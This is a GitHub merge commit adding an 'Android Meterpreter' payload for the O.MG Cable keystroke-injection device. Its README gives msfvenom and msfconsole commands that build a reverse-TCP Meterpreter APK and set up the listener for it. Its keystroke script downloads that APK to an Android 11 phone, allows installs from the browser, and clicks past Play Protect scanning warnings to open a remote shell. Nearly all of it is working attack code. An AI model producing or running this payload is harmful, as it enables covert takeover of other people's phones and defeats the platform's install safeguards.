Merge pull request #11 from int0x80/android-meterpreter

Android Meterpreter
pull/14/head
OMG-MG 2022-01-13 19:22:45 -08:00 committed by GitHub
commit 54fef53fb3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 169 additions and 0 deletions

View File

@ -0,0 +1,39 @@
# Android Meterpreter
An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes.
I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app.
## Generate Payload
Regular `msfvenom` payload generation.
```D
$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 79592 bytes
Saved as: /data/omg.apk
```
## Handler
These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`.
```
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
```
## Miscellaneous
Some apparent artifacts remain. This is an abbreviated list.
* Notification shows apk was downloaded
* APK remains installed as MainActivity
* `app_uninstall com.metasploit.stage` does not remove the apk

View File

@ -0,0 +1,130 @@
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android
REM # Author: int0x80
REM # Target: Android 11
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------
REM # -----------------------------------------------------------
REM # Launch browser to APK destination
REM # -----------------------------------------------------------
GUI b
DELAY 1000
CTRL l
DELAY 50
STRING https://x.x.x.x/your-app.apk
DELAY 50
ENTER
DELAY 2000
REM # -----------------------------------------------------------
REM # Move focus to 'Open' link
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
RIGHT
DELAY 50
ENTER
DELAY 500
REM # -----------------------------------------------------------
REM # Select Chrome as approved source to install apps
REM # -----------------------------------------------------------
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Finish approved source
REM # GUI DELETE might work here
REM # -----------------------------------------------------------
GUI TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Scanning and Play Store warnings
REM # Install, Install Anyway, Don't send for scanning, Open
REM # -----------------------------------------------------------
RIGHT
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Accept access settings and Continue
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Get shell and obligatory calc
REM # -----------------------------------------------------------
ENTER
DELAY 250
GUI a